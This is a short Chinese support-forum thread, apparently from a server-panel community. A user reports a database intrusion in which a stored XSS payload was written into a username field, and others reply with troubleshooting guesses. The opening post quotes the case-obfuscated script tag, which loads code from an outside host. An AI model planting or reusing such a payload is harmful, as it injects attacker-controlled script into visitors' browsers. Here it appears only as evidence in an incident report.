【待反馈】数据库被入侵了，发布一下细节

用户表的用户名被加入了<sCRiPt/SrC=//xs.ax/hAz2>，导致前台显示用户名的时候页面导入xs.ax/hAz2里面的内容，不知道怎么被入侵的，一头雾水。是专业版太差了吗，要升级企业的吗？

大炮运维V587 · 发表于 2022-8-4 09:19:46

您好，您的数据库开启外网访问了吗？

宝塔用户_fcgtve · 发表于 2022-8-4 10:33:02

大炮运维V587 发表于 2022-8-4 09:19
您好，您的数据库开启外网访问了吗？

你好，数据库访问权限，一直是本地服务器访问，现在升级企业版了，但是企业版的重构防篡改安装不上，一直报错

不明 · 发表于 2022-8-4 19:32:33

宝塔装的mysql不是最新的，可能有CVE

不明 · 发表于 2022-8-4 19:34:45

也有可能你的程序有问题

河妖 · 发表于 2022-9-19 15:43:17

宝塔用户_fcgtve 发表于 2022-8-4 10:33
你好，数据库访问权限，一直是本地服务器访问，现在升级企业版了，但是企业版的重构防篡改安装不上，一直 ...

您好请问问题处理好了吗安装不上报错截个图麻烦发一下，是什么系统？